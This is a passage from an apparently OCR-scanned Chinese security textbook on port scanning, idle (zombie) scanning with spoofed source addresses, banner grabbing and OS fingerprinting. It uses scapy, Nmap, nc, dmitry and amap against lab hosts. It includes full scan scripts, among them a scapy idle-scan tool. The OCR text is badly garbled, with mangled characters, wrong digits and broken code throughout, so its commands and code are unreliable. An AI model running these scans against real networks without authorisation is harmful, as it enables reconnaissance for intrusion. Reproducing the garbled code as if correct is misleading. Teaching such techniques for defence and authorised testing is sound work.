Estee 图 使 用 Wirshark 抓 包工 具 抓 取 通 信 过 
程 ， 再 次 验证 猜想 ， 可 以 发 现 有 5 个 数据 
包 ， 主 机 发 送 SYN 数 据 包 ， 目 标 主机 回复 
SYN/ACK 数 据 包 ， 操 作 系 统 回 复 RST 数 
据 包 ， 此 时 已 经 中 断 连接 ， 主 机 再 次 发 送 
ACK 数 据 包 ， 目 标 主机 回复 RST 数 据 包 ， 
整个 通信 过 程 如 下 图 所 示 。 


Besinston 


Protocol LengtW inio 


使 用 iptables -A OUTPUT -p tcp --tcp- 
flags RST RST -d 192.168.1.1 -j DROP 命令， 
系统 自 带 防 火 墙 设置 过 滤 ， 但 不 自动 发 送 
RST 数 据 包 。 使 用 iptables - 工 命令 ， 检 查 防 
火 墙 规则 是 否 生 效 ， 如 下 图 所 示 。 


FGGtaKaUICTTSSTTorrIPEa6UES -TC 
Ehain INPUT (policy ACCEPT) 


Karget prot opt source destination 
Ehain FORWARD (policy ACCEPT) 

Karget prot opt source destination 

Ehain OUTPUT (policy ACCEPT) 

Karget prot opt source destination 

pRop tep anywhere _gatevay tcp flags:RST/RS 


[step 园 再 次 运行 脚本 ， 查 看 最 后 一 次 返回 数 
据 ， 如 下 图 所 示 。 由 此 看 来 三 次 握手 正常 


-SENT -= 
Hi#[ IP ]#4# J CP J PT ITP 了 AT TCP ] 和 玫 
version = Sport = ftp_data version = 4 sport = http 
iht dport = http iht = 5 dport ftp_data 
tos seq = 9 tos = 9x9 seq 895120079 
Len ack = 3865475985 len = 49 ack 
id dataofs = None id = 40580 dataofs =5 
fags reserved = 9 flags =DF reserved = 
WB 合并 frag = flags A 
frag ttl = 64 window 16384 
window = 8192 
ttl proto = tcp chksum Qx936c 
proto 村 chksum = 6x1895 urgptr 9 
chksum 人 src = 192.168.1.1 options = [] 
src options = [] dst = 192.168.1.191 |###[ Padding ]### 
dst = 192.168.1.1 -- RECEIVED -- ‘options load = '\x00\x00\x00\x00\x00\x00 
\options \ 


Bp 国 构建 完成 后 ， 返 回 的 数据 包 如 下 图 
所 示 。 
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Step 


通过 Wirshark 抓 包工 具 抓 取 通 信 过 
程 ， 如 下 图 所 示 。 


54 28 - 86 [SYN] Seq-® Win-8192 Lenze 
59 98 ~ 26 [STN, ACK] Seqc8 Ack=1 Win=16384 Len=9 155=1408 


(2) Nmap 工具 。Nmap 工具 本 身 自 带 
了 全 连接 扫描 功能 ， 用 户 使 用 简单 的 命令 
配置 即 可 完成 TCP 端口 扫描 ， 有 具体 的 操作 
步骤 如 下 : 
[step 图 使 用 Nmap -sT 192.168.1.103 -p 135 命 
令 ， 对 主机 特定 端口 实施 全 连接 扫描 ， 如 
下 图 所 示 。 


roEGKaUI:- 关 mnap -ST I92. 168.1.103 -p 
pe Nmap 7.79 ( https://nmap.org ) at 2918-19-26 22:23 EDT 
Nnap scan report for 192.168,1.103 

ost is up (6.99935s latency|. 


ORT 。 STATE SERVICE 
135/tcp open msrpc 
MAC Address: 90:0C:29:A2:4E:07 (VMware) 


map done: 1 IP address (1 host up) scanned in 6.14 seconds 


step 园 使 用 Nmap -sT 192.168.1.103 -p 1-200 
命令 ， 可 以 对 区 间 的 端口 进行 扫描 ， 如 下 
图 所 示 。 


Foot@rali -# nmap -ST 192.168.1.163 -p 1-268 
Nmap 7.79 ( https://nmap.org ) at 2918-19-26 22:29 EDT 


map scan report for 192.168.1.193 

ost 1s up (8.9919s latency) 

jot shown; 198 closed ports 

ORT STATE SERVICE 

35/tcp open msrpc 

ha9/tcp open netbios-ssn 

IAC Address: 90:0C:29:A2:4E:07 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 9.17 seconds 


step 图 使 用 Nmap -sT 192.168.1.103 -p 
135,445,555 命 令 ， 对 一 组 端口 进行 扫描 ， 
如 下 图 所 示 。 


DOOKUI# TMap -ST L92168.1.193 -p 135, 445,555 
tarting Nmap 7.70 ( https://nmap.org ) at 2018-10-26 22:27 EDT| 
map scan report for 192.168,1.193 

ost is up (0.00048s latency). 


ORT STATE 
35/tcp open msrpc 

45/tcp open microsoft-ds 

55/tcp closed dsf 

C Address: 00:0C:29:A2:4E:07 (VMware) 


SERVICE 


map done: 1 IP address (1 host up) scanned in 6.13 seconds 


step 加 如果 没 有 提供 端口 ， 默 认 情 况 下 
Nmap 会 自动 扫描 1000 个 常用 端口 ， 如 下 图 
所 示 。 


EE -Fnmap -sT 192.168.1.103 


tarting Nmap 7.79 ( https://nmap.org ) at 2918-19-26 22:31 EDT| 
map scan report for 192.168.1.163 

ost is up {9.9925s Latency) . 

ot shown: 996 closed ports 

ORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios-ssn 

45/tcp open microsoft-ds 

2869/tcp open icslap 

二 Address: 69:6C:29:A2:4E:97 (VMware) 
mm 


ap done: 1 IP address (1 host up) scanned in 1.39 seconds 


侈 提示 : 通过 Nmap -sT -iL addrtxt -p 80 命 
令 ， 可 以 对 导入 文件 中 的 地 址 进行 扫描 。 
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(3) dmitry 工具 。dmitry 工具 的 功能 简 
单 ， 使 用 起 来 不 用 配置 太 多 参数 ， 默 认 150 
个 常用 端口 。 使 用 dmitry 工具 进行 扫描 的 
操作 步骤 如 下 : 
[step 图 输入 dmitry 命 令 ， 可 以 查看 该 工具 的 
参数 信息 ， 执 行 效果 如 下 图 所 示 。 


Deepnagic 1nfornation Gathering Tool 
There be sone deep nagic going on 


Usage: dnitry |-winsepfb] [-t 9-9] [-o shost.txt] host 
-9 Save output to %host.txt or to file specified by -0 file 
1 Perforn a whois looxup on the IP address of a hest 


- 
b 


Perform a whols Looxup on the dowaln nane of a host 
Retrieve Netcraft.com information on a host 
Perform a search for possible subdomains 
Perform a search for possible emall addresses 
Perforn a TCP port scan on a host 
PerTorm a TCP port scan on a host showing output reporting filtered port 
Read in the banner received from the scanned port 

-9 Set the TTL 1n seconds when scanning a TCP port ( Default 2 ) 

PRequires the -p flagged to be passed 


使 用 dmitry -p 192.168.1.103 命 令 ， 实 
现 常用 150 个 端口 的 扫描 ， 如 下 图 所 示 。 


Footakali -# onitry -p 192.168.1.163 
Deepnagic Information Gathering Tool 
“There be sone deep magic going on" 


ERROR: Unable to locate Host Name for 192.168.1.103 
Continuing with limited nodules 
jostIP:192.168.1.193 

HostNane 


Sathered TCP port information for 192.168.1.193 


Porr Srare 
33/tcp open 
has/tcp open 


Portscan Finished: Scanned 150 ports, 147 ports were in state closed 


ALL scans conpleted, exiting 


(4) nc 工具 。nc 工具 也 有 一 个 扫描 的 
功能 ， 使 用 nc -nv -wl -z 192.168.1.103 1-1000 
命令 可 以 对 指定 端口 区 间 进 行 扫描 ，nc 扫 
描 的 结果 除 给 出 端口 外 ， 还 给 出 了 可 能 使 
用 的 服务 名 称 ， 如 下 图 所 示 。 


Foot@kali:~# nc -nv -wl -z 192.168.1.103 1I-10600 
(UNKNOWN) [192.168.1.193] 445 (microsoft-ds) ope 
(UNKNOWN) [192.168.1.193] 139 (netbios-ssn) open 
(UNKNOWN) [192.168.1.193] 135 (Loc-srv) open 


在 扫描 命令 中 ，-nv 表 示 后 面 给 出 的 是 
一 段 IP 地 址 ， 不 做 域名 解析 ; -w1 是 设置 超 
时 时 间 1s; -z 是 进行 扫描 。 

nc 还 可 以 写成 脚本 的 形式 ， 具 体 代码 
1 


坦 循环 取出 139-200 的 端口 进行 扫描 最 后 过 滤 出 
open 状 态 的 端口 

for x in $(seq 139 200) ;do nc -nv -Ww 
1 =z 192.168.1.103 $xsdone | grep open 
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还 可 以 写成 扫描 IP 地 址 段 ， 具 体 代码 
如 下 : 
# 循 环 取出 1-254, 扫描 该 区 段 IP 指 定 端 口 


for x in $(seq 1 254);do nc -nv -WwW 1 
-2z 192.168.1.$x 80;done 


3. 中 间 人 扫描 


中 间 人 扫描 〈 也 称 为 僵尸 扫描 ) 扫描 
方式 极度 隐蔽 ， 但 是 实施 条 件 苛刻 。 首 先 
扫描 方 允许 伪造 源 地 址 ， 其 次 需要 有 一 台 
中 间 人 机 器 。 中 间 人 机 器 需要 具备 如 下 两 
个 条 件 : 

第 1 条 : 在 网 络 中 是 一 个 闲置 的 状态 ， 
没有 三 层 网 络 传输 。 

第 2 条 : 系统 使 用 的 IPID 必 须 为 递增 形 
式 的 才 可 以 ， 不同 的 操作 系统 IPID 是 不 同 
的 ， 如 有 的 是 随机 数 。IPID 是 IP 协 议 中 的 
Identification 字 段 ， 如 下 图 所 示 。 


F Trane Protoeol Verslon ,Srer 83,1758"3168 Dt 350-320,150"185 
910) a 


- ngth: 29 byte 
» Differentiated services Ficld; Ox 5 (Bdcp: cso, Ecw: Not-EcT) 
To nt 
， 36" Dt ronant IPID 
Tine to live: 
Protocolt Ye 18) 
Header checksun: 0x03c1 [validation disabled] 
reader chockaun status: Unverified] 
Source: 102,168.1 
Des[Ination;21g8*i20.166.185 


中 间 人 扫描 实现 的 原理 ， 如 果 需 要 分 
解 成 步骤 ， 可 以 分 为 如 下 几 个 步骤 : 
[sep 图 扫描 者 向 中 间 人 机 器 发 送 一 个 SYN/ 
ACK 数 据 包 ， 此 时 中 间 人 机 器 会 回复 一 个 
RST 数 据 包 。 这 个 RST 数 据 包 中 便 包 含 IPID 
值 ， 记 录 IPID 值 。 
[step 图 扫描 者 向 目标 主机 发 送 SYN 数 据 包 。 
此 时 SYN 中 的 源 地 址 为 伪造 地 址 (中 间 人 
机 器 地 址 ) ， 如 果 目 标 主机 端口 开放 便 会 
向 中 间 人 机 器 发 送 SYN/ACK 数 据 包 ， 中 间 
人 机 器 会 给 目标 机 回复 RST 数 据 包 ， 此 时 
IPID+1 进 行 递增 。 

如 果 目 标 主机 端口 没有 开放 ， 目 标 主 

会 给 中 间 人 机 器 发 送 RST 数 据 包 ， 中 间 人 

不 予 回应 ，IPID 保 持 不 变 。 
[step 图 扫描 者 再 次 向 中 间 人 机 器 发 送 SYN/ 
ACK 数 据 包 ， 等 待 回复 RST 数 据 包 以 获取 
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IPID 值 。 拿 到 这 个 IPID 值 进行 比 对 ， 如 果 
IPID 值 为 IPID+2， 则 证 明 目 标 主机 端口 开 
放 ， 否 则 目标 主机 端口 未 开放 。 
(1) scapy 工具 。 使 用 scapy 实现 中 间 
人 扫描 。 首 先 需 要 对 中 间 人 主机 检验 ， 具 
体操 作 步 又 如 下 : 
step 图 构建 发 送 给 中 间 人 的 数据 包 ， 如 下 图 
所 示 。 
>> TI=TPTJ 
>>> t=TCP() 
p>> rm=(i/t) 
>>> rm[IP].dst = "192.168.1.193" 
>> rm[TCP] .flags = '5" 
>> srl(rm).display() 


Begin emission: 
Finished sending 1 packets. 


Received 2 packets, got 1 answers, remaining © packets 


查看 返回 数据 包 中 的 IPID 值 ， 如 下 图 


所 示 。 

PAF IP 本 WAFL TEP JAH# 
version= 4 sport= http 
iht= 5 dport= ftp data 
tos= 9x9 IPID seq= 9 

en= ack= 1 
dataofs= 5 

EPE reserved= 0 
frag= 9 flags= RA 
ttl= 128 window= 9 
proto= tcp chksum= Ox2b4f 
chksum= Oxa556 urgptr= 0 
src= 19. 1.163 options= [] 
dst= 192.168.1.101 ###[ Padding ]### 
\options\ load= ' FHEPF 


再 次 发 送 相同 数据 包 给 中 间 人 机 器 ， 
查看 数据 包 中 IPID 值 ， 如 下 图 所 示 。 如 果 
此 时 IPID 值 为 递增 ， 并 且 两 个 数据 包 前 后 
数值 差 1， 这 个 中 间 人 机 器 才 符 合 扫描 要 
求 ， 否 则 无 法 判断 。 


PIT TP J BAAL TCF 天 
version= 4 sport= http 
ihl= 5 dport= ftp_data 
tos= Ox0 IPID seq= 0 
len= 49 ack= 1 
dataofs= 5 

395= reserved= 0 

frag= 9 flags= RA 
ttl= 128 window= 9 
proto= tcp chksum= 9x2b4f 
chksum= 9xa555 urgptr= 0 


Src= 192.165.1.193 options= [] 
dst= 192.168.1,101 ###[ Padding ]### 
| \options\ load= '\x92\x94\x95\xb4\xgl\x93| 


有 了 中 间 人 机 器 后 便 可 以 实施 扫描 ， 
具体 操作 步 又 如 下 : 
[step 图 | 构建 发 送 给 目标 机 的 数据 包 ， 如 下 图 
所 示 。 这 里 使 用 send 发 送 不 查看 返回 数据 ， 
目标 地 址 是 要 扫描 的 主机 地 址 ， 源 地 址 需 
要 设置 成 中 间 人 地 址 。 


户 = EIPU 

=>> t=TCP() 

b> rd=(i/t) 

p>> rd[IP] .dst = "192.168.1.1" 
p>> rd[IP].src =“192.158.1.193 
上 >> rd[Tcp] .flags = 'S5" 


[step 图 先 给 中 间 人 机 器 发 送 一 个 SYN 数 据 
包 ， 记 录 下 IPID 值 ， 如 下 图 所 示 。 接 着 使 
用 send(rd) 命 令 ， 将 数据 包 发 送出 去 ， 使 用 
send 发 送 不 查看 返回 数据 。 

ein nll ier YY 


Finished sending 1 packets. 
四 


Received 1 packets, got 1 answers, remaining 6 packets 


j#W#[ IP ]### 各 好 [ TCP ]### 
Version= 4 
ihl= 5 
tos= Ox0 
len= 49 
id= 4476 dataofs= 5 
flags= reserved= 9 
frag= 0 flags= RA 
ttl= 128 window= 9 
proto= tcp chksum= 9x2b4f 
chksum= 9xa537 urgptr= 0 


options= [] 
###[ Padding ]### 
load= '\x01\x01\x88\n\x60\x00" 


src= 192.168.1.103 
dst= 192.168.1.101 
\options\ 


再 次 快速 给 中 间 人 机 器 发 送 一 个 SYN 
数据 包 ， 查 看 IPID 值 ， 如 下 图 所 示 。 通 过 
比较 两 个 IPID 值 ， 如 果 相 差 为 2， 证 明 目 标 
主机 端口 开放 。 

>>> SrI(rm).display() 


Begin emission: 
Finished sending 1 packets. 
+ 


eceived 1 packets, got 1 answers, remaining 9 packets 
HH#[ IP ]### ###[ TCP ]### 
version= 4 sport= http 
dport= ftp_data 
seq= 9 
ack= 1 
dataofs= 
reserv 
flags= RA 
window= 9 
chksum= 9x2b4f 
urgptr= 9 
options= [] 
###[ Padding ]### 
load= '\x90\x68 DBD 


下 面 给 出 一 段 自动 化 测试 代码 ， 具 体 
代码 如 下 : 


#!/usr/bin/python 
import logging 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
状 定 义 一 个 函数 用 于 测试 中 间 人 主机 是 否 合格 
def ipid(mid) : 
Freplyl = srl(IP(dst = mid)/TCP(Hags = 
'S') ,timeout=2,verbose=0) 发送 SYN 数 据 包 
send(IP(dst = mid)/TCP (flags="'SA'), 
# 发 送 SYN/ACK 数 据 包 


proto= tcp 

chksum= 9xa535 
2.168.1.103 
2.168.1.101 


Verbose=0) 
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reply2 = srl(IP(dst = mid)/TCP (flags = 
"S") ,timeout=2,verbose=0)# 再 次 发 送 SYN 数 据 包 
if reply2[IP].id == (replLlyl[IP]- 
id+2): 坦 判 断 两 次 SYN 数 据 包 返 回 包 是 否 差 值 为 2 
print "IPBID meet a criterion™ 
# 如 果 差 值 为 2, 符合 要 求 , 询 问 是 否 扫描 
response = raw input("start 
scanning (Y or Nye ") 
if response == 'Y': 
# 输 入 Y 进 入 扫描 ， 需 输入 一 个 目标 机 IP 地 址 
target = raw input("Enter the IP 
Destination host address: ") 
midscan (target,mid) # 调 用 扫描 函数 
else: # 不 符合 要 求 做 出 提示 
print"Does not meet the requirements, cannot 
be used as an intermediary machine" 
# 定 义 用 于 扫描 的 函数 
def midscan(target,mid): 
print "\nScanning target" + target 
+ "with mid" + mid # 打 印 出 一 些 提示 信息 
print, 生 N 关 一 一 一 一 一 一 一 一 一 一 一 Open Ports on 


for port in range(100,200) : 
# 循 环 遍历 100-200 的 端口 
CPYE # 给 中 间 人 发 送 一 个 数据 包 
start val = srl(IP(dst=mid)/TCP (fl 
ags="'SA',dport=port) ,timeout=2, verbose=0) 
# 给 目标 机 发 送 一 个 伪造 数据 包 
send(IP(src=mid,dst=target)/TCP( 
flags='S',dport=port),verbose=0) 
# 再 给 中 间 人 发 送 数据 包 
end val = srl(IP(dst=mid) /TCP (fa 
gs='SA'),timeout=2,verbose=0) 
if end_val[IP].id == 
val[IP]+2) :  ## 判 断 两 次 ITPID 值 是 否 为 2 
print port # 符 合 要 求 打印 出 端口 
excepts: 
pass ## 不 符合 要 求 直接 Pass 
# 脚 本 主体 部 分 先 打 印 提示 信息 


print"— --Mid Scan Suite- 


(start_ 


_\n" 
print"l1 - Identify Mid Host\n" 
print"2 - Perform Mid ScanNn" 

ans = raw_ input ("Select an Option (1 


Gr 2 

if ans == "1': # 选 项 1 测试 中 间 人 机 器 ， 输 
入 一 个 IP 地 址 

mid = raw input("Enter IP address 
to test IPID sequence: ") 

ipid(mid) 。 # 调 用 中 间 人 测试 函数 

下 十 本息 世 

if ans == '2':  # 选 项 2 直接 扫描 ， 输 入 中 
间 人 IP 地 址 以 及 扫描 主机 IP 地 址 


mid = raw input ("Enter IP adderss 
for Mid System: ") 
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target = raw input ("Enter IP adderss 
for Scan target: ") 
midscan(target,mid) 


## 调 用 扫描 函数 


(2) Nmap 工具 。Namp 工具 提供 了 中 
间 人 这 种 扫描 方式 ， 当 然 前 提 是 中 间 人 机 
器 符合 要 求 ， 再 进行 扫描 。 具 体操 作 步 骤 
如 下 : 
Eee 四 使 用 Nmap -p139 192.168.1.103 
-script=ipidseq.nse 命 令 ， 检 验 中 间 人 机 
器 是 否 符 合 要 求 ， 如 下 图 所 示 。 它 的 
判断 依据 仍然 是 IPID 是 不 是 一 个 增 
(Incremental) 。 


Ee 7TTEsTTPorE nmap p139 192-168-T-163 -script=ipidseq.nse 


Wh 


starting Nmap 7.79 ( https://nmap.org ) at 2918-16-27 92:52 EDT 
map scan report for 192.168.1.103 
ost is up (9.00036s Latency|. 


PORT STATE SERVICE 
139/tcp open netbios-ssn 
IAC Address: 99:6C:29:A2:4E:67 (VMware) 


Host script results; 
| _ipidseq: Incremental! 


map done: 1 IP address (1 host up) scanned in 9.61 seconds 


[step 国 使 用 Nmap 192.168.1.1 -sl 192. 
168.1.104 -Pn -p 1-100 命 令 进行 中 间 人 扫 
描 ， 第 一 个 IP 是 需要 扫描 的 目标 机 器 ， 第 二 
个 IP 是 中 间 人 主机 ，-sI 指 定 的 参数 便 是 中 
间 人 ， 如 下 图 所 示 。 


FaatgRaUIS=7TSST7PorE nmap L92168-1-1 -st 192-168-1 104 -Pn -p IT-T69 
Starting Nmap 7.70 ( https://nmap.org ) ar 2818-19-27 @3:07 EDT 

lidle scan using zonbie 192.168.1.104 (192.168.1,104:80); Class: Incrementel 
map scan report for 192.168,1.1 

Host 1s Up (8,928s Latency). 

ot shown; 99 closed|filtered ports 

ORT 。 STATE SERVICE 

/tcp open http 

IAC Address: 1C:FA:68:81:2F:08 (Tp-link Technologies) 


map done: 1 IP address (1 host up) scanned in 2.24 seconds 


11.2 扫描 主机 其 他 信息 


通过 端口 扫描 确定 端口 后 ， 根 据 不 同 
端口 判断 目标 主机 可 能 存在 哪些 服务 ， 从 
而 识别 目标 操作 系统 ， 为 后 续 的 防范 工作 
做 准备 。 


11.2.1 扫描 banner 信 息 


通过 banner 信 息 可 以 识别 目标 主机 的 软 
件 开发 商 、 软 件 名 称 、 服 务 类 型 、 版 本 号 
等 信息 。 不 过 ， 这 个 banner 信 息 可 修改 ， 
此 识别 并 不 是 很 准确 ， 获 取 banner 信 息 必 须 
要 与 目标 主机 建立 连接 。 
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1. python 脚 本 


使 用 python 脚 本 获取 banner 信 息 ， 有 具体 
代码 如 下 : 


import socket # 导 入 一 个 用 于 网 络 编程 的 库 

banner=socket.socket (socket.AF_ 
INET, socket .SOCK_STREAM) # 创 建 连接 

banner.connect(("192.168.1.105",21)) 
# 使 用 connect 建 立 关联 

banner.recv (1024)# 使 用 recv 函 数 接收 数据 

"220 (vsFTPd 2.3.4)\r\n’' 

# 返 回 的 banner 信息 

banner.close ()# 使 用 完 对 象 后 记得 关闭 

exit () # 退 出 python 环 境 


二 二 人 es 
运行 脚本 执行 效果 ， 如 下 图 所 示 。 

FaatBKRGUII-TTESE7POTEF Python 

Python 2.7.15+ (default, Aug 31 2618，11;56:52) 

[scc 8.2.9] on linux2 

Type “help’, "copyright", "credits® or "license" for more information 

|>> import socket 

>>> banner=socket.socker(sacker.AF_TNET,socket SOCK_sTREAM) 

>>> banner.connect(("192.168.1.165*,21)) 

|>> banner,recv11924) 

"228 (vsFTPd 2.3,9)Nrvm' 


>>> banner. closel) 
2>> exit() 


在 实际 环境 中 很 多 机 器 是 不 允许 获取 
banner 信 息 的 ， 如 果 是 这 样 ，recv 函 数 会 
被 挂 起 ， 一 直 等 竺 返回。 下面 给 出 一 段 脚 
本 ， 可 以 避免 recv 函 数 被 挂 起 ， 有 具体 代码 
如 下 : 


#!/usr/bin/python#python 脚 本 默认 格式 
import socket # 导 入 socket 库 
import select # 导 入 select 库 
import sys # 导 入 sys 库 
if lenl(sys.argv) !=4: 
# 判 断 输入 参数 如 果 不 等 于 4, 打印 出 提示 信息 
Print "Usage ./banner_greab .py 
[Target IP] [First Port] [Last Port]" 
print "Example -:/banner greab.py 
192.168.1.1 100 200" 
print "Example will grab banners for 
TCP ports 100 through 200 on 192.168.1.1" 
sys.exit() 
ip = sys.argv[1] # 获 取 IP 地 址 
start = int(sys.argv[2])# 获 取 起 始 端口 号 
end = int(sys.argv[3]) # 获 取 结 束 端 口号 
for port in range (Startvend) : 
# 循 环 获取 端口 
trY: 。 ## 创 建 TCP 连 接 
bangrab = socket.socket (socket. 
AF_INET, socket .SOCK_ STREAM) 
bangrab.connect ( (ip,port)) 
坦 以 相应 的 端口 建立 连接 
ready = select.select([bangrab], 


[],[],1) # 获 取 返 回信 息 ， 超 时 时 间 1s 


if ready[0]: 
## 如 果 返 回信 息 不 为 空 ,将 信息 打印 
print "™ TCP Port" + str(port) 
+"'."'+bangrab.recv(1024) 


bangrab.close() 关闭 对 象 
except: 
pass 。” # 如 果 超 时 ,就 继续 下 一 个 端口 


执行 脚本 效果 如 下 图 所 示 。 


FaatgkaUI:=~7TesST7SerVIce .ban_grab.py 192.168.1.165 1 566 | 
TCP Port21.226 (vsFTPd 2.3.4) 


TCP Port22.55H-2.0-OpensSH_4.7pl Debian-8ubuntul 


TCP Port23.0000 dob#00' 
LTcPp Port25.220 metasploitable.localdonain ESMTP Postfix (Ubuntu) 


2. dmitry 工 具 


使 用 dmitry 工 具 可 以 获取 banner 信 息 ， 
执行 dmitry -pb 192.168.1.105 命 令 ， 即 可 获 
取 banner 信 息 ， 如 下 图 所 示 。 


FEBEmered TCP PGTT TNTOrMATIDN TOr T97-T69-T-T95 


1/tcp open 
> 229 (vsFTPd 2.3.4) 


2/tcp open 
> SSH-2.0-0pensSsH 4.7p1 Debian-8ubuntul 


3/tcp open 
> OObO Vozdb' 

5/tcp open 

> 229 metasploitable. localronain ESNTP Postfix (Ubuntu 
3/tcp open 


ortscan Finished; Scanned 159 ports, 144 ports were in state closed 


3. Nmap 工 具 


Nmap 工 具 提 供 了 很 多 已 经 写 好 的 脚 
本 ， 从 而 进行 banner 信 息 的 扫描 ， 有 具体 操作 
步骤 如 下 : 
执行 Nmap -sT 192.168.1.105 -p22- 
-Script=bannernse 命 令 ， 可 以 获取 目标 主 
机 22 端 口 的 banner 信 息 ， 执 行 效果 如 下 图 
所 示 。 


OER -TTS ter Vice nmap -5T-T92"T68"T"T95 一 DZ -Script=bannernsd 
tarting Nnap 7.79 ( https://nnap.org ) at 2919-16-27 95:21 EDT 

Nmap scan report for 192.168.1.105 

ost 1s up (0.09043s Latency). 


oORT STATE SERVICE 
R2/tcp open ssh 

|_banner: SSH-2.9-0penSSH 4.7p1 Debian-8ubuntul 
IAC Address: 90:0c:29:FA:DD:2A (VMware 


Nmap done: 1 IP address (1 host up) scanned in 6.45 seconds 


[step 图 使 用 Nmap 192.168.1.105 -p 1-100 -sV 
命令 ，-SV 参 数 表 明 使 用 特征 扫描 ， 基 于 特 
征 扫描 会 显示 出 更 多 的 信息 ， 执 行 效果 如 
下 图 所 示 。 
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we rpF: rp:yoslinmeTinm kernel 


ts at https://omap.org/subnlty 


信 提示: 通过 banner 信 息 可 以 获取 端口 对 
应 什么 服务 ， 该 信息 量 少 而 且 不 够 准确 ， 
而 使 用 Nmap 工 具 提 供 的 特征 扫描 ， 可 以 扫 
描 出 更 多 的 信息 。 


4.amap 工 具 


amap 是 首 款 针对 渗透 测试 人 员 的 扫描 
工具 ， 它 会 识别 在 端口 上 运行 的 应 用 程序 ， 
还 可 以 通过 发 送 触发 数据 包 并 在 响应 字符 串 
列表 中 查找 响应 ， 来 识别 基于 非 ASCII 编 码 
的 应 用 程序 。 使 用 语法 格式 如 下 : 
[-s] [-ul [-m oab] [-M 


[-n connections] [-N delay] 
[-e] [-v] TARGET PORT 


使 用 amap 工 具 进 行 扫描 的 操作 步 又 
如 下 : 
使 用 amap -b 192.168.1.105 22 命 令 ， 
可 以 获取 banner 信 息 ， 如 下 图 所 示 。 


Footekali: /Test/Service# amp -6 192.168.1.165 22 
amap v5.4 (www.thc.org/thc-anap) started at 2018-19-27 95:31: 
3 - APPLICATION MAPPING mode 


amapcrap 
min, max] 
[-w delay] 


Protocol on 192.168.1.165:22/tcp matches ssh - banner: SSH-2. 
+openssH_4.7p1 Debian-8ubuntul\nprotocol mismatch.\n 

Protocol on 192.168.1.195:22/tcp matches ssh-openssh - banner: 
SSH-2.9-0penSSH 4.7p1 Debian-8ubuntul\nProtocol mismatch.\n 


Unidentified ports: none. 


amap v5.4 finished at 2918-16-27 95:32:04 


多 提示 : 使 用 amap -b 192.168.1.105 1-100 
命令 ， 可 以 扫描 区 段 端口 。 


[step 图 amap 提 供 了 基于 特征 的 扫描 ， 直 接 使 
用 amap 192.168.1.105 1-100-q 命 令 ， 可 以 进 
行 基于 特征 的 扫描 ， 并 给 出 比较 详细 的 信 
息 ， 如 下 图 所 示 。 


Poot 7 restr rcs p192- I6- 1 L051-I00 
eap v3.4 (ww. th€-org/the anap) started at 2618-19-27 @5:53:29 ~ APPLICATION NAPPING mod 


Protocol on 192.168.1.165:25/tcp matches smtp 
Protocol on 192.168.1.185:53/tcp natches dns 
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[step 图 在 基于 特征 扫描 的 过 程 中 ， 如 果 加 入 
b 参 数 ， 会 使 扫描 结果 更 加 精确 ， 扫 描 结 果 
如 下 图 所 示 。 


FaaaaaG mp 197, T81193 1-109 95 
map V3 4 (enwe, he org/ the mop] Startod at 201819-27 96:00:83 ~ APPLICATION NAPPING node 


rotocol on 192,168.1,195:21/tep matches ttp - banner: 228 (vsrTpd 2.3. 


0 Please Togan| 


jn 192.168.1.185:22/tcp matches ssh-opens SH-2.8-0pensSH 4.7p1 Det 


I 
rotocol on 192,168.1,195:25/tcp matches sntp - banner; 228 netasploitable.localdomain ESHTP 
po ant 


banner: 229 merasptoirabte ,tocatdomain ESHTP 


oracol an 192 Mod" L103 33/rcn Wirches Hns ,banner YY 


11.2.2 ”探索 主机 操作 系统 


操作 系统 安装 完成 后 总 会 默认 打开 一 
些 端 口 ， 针 对 这 些 默 认 端 口 可 以 判断 出 一 
个 系统 的 类 型 ， 当 然 操作 系统 的 识别 种 类 
繁多 ， 更 多 的 是 采用 多 种 技术 组 合 比较 来 
进行 确认 。 


1. 主动 式 扫描 的 一 些 方法 


首先 通过 主动 扫描 收集 信息 ， 然 后 将 
收集 的 信息 进行 特征 比 对 ， 由 此 推断 出 操 
作 系 统 类 型 的 方式 。 

(1) python 工具 。 基 于 TTL 值 进 行 扫 
描 的 方式 ， 根 据 不 同 操作 系统 TTL 值 不 同 
的 特征 来 进行 判断 。Windows 默认 TIL 值 
是 128 (65 ~ 128) ，Linux/Unix 默认 TTL 
值 是 64 (1 一 64) ， 也 有 某 些 Unix 默认 
TIL 值 是 255。 基 于 TTL 值 进 行 判断 的 脚 
本 ， 具 体内 容 如 下 : 


#!/usr/bin/python 

from scapy.all import* 

import logging 

logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 

import sys 

if len(sys.argv) !=2: 

Print "Usage ./ttl os.py [Target IP]" 

print "Example ./ttl os.py 192.168. 
be 

print "Example will perform 七 I1 
analysis to attempt to determine wheter 
the system is windows or Linux/Unix " 

SYS -exit() 


ip=sys.argv[1]  # 获 取 IP 地 址 
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ans=srl(IP(dst=str(ip))V/VICMP()， 
timeout=1l,verbose=0)## 发 送 ICMP 数 据 包 

if ans == None:# 如 果 没 有 回复 信息 ,做 出 提示 

print "NO response was returned " 

elif int(ans[IP] .ttl)<=64:# 如 果 TTL 值 
小 于 64, 提 示 Linux/Unix 系 统 

print "Host is Linux/Unix" 

else: # 都 不 是 提示 Windows 系 统 


Print "Host is Windows" 

使 用 python 脚 本 识别 系统 ， 执 行 脚本 两 
次 ， 分 别 扫描 Linux 系 统 与 Windows 系 统 ， 
执行 效果 如 下 图 所 示 。 
root@kali:-/Test/Service# /tt os.py | 
Host is Linux/Unix 


root@kali:~/Test/Service# ./ttl os.py 192.168.1.160. 
Host is Windows 


(2) Nmap 工具 。 使 用 Nmap 工具 来 判 
断 操作 系统 ， 具 体操 作 步 又 如 下 : 
使 用 Nmap 192.168.1.103 -O 命 令 来 进 
行 扫描 ， 扫 描 Windows 操 作 系 统 ， 并 且 给 出 
人 如 下 图 所 示 。 


er 
a 2018-10-27 00:33 ED 


oft mindors 0 Sra” Sp4, WRGows WY ra Sr, 
bop 


on re Mense er 
less tenes 9 e007ess (Pes ee) wm 


step 图 使 用 Nmap 扫 描 Linux 系 统 的 信息 ， 执 
Pp 


I 
ong ) at 2618 -19.27 06:38 EDT 


2 


ar hetpss//mmap, org/subntt/ 


tcp open donain 
NAC Alaress: "ee:8C:29 
Ptee wpes seer Er 
ee ee 全 an Uns hernetiz.s 
bs detail 

et 


20022A (Warel 


移 提 示 : 从 扫描 出 的 信息 中 可 以 看 到 Nmap 
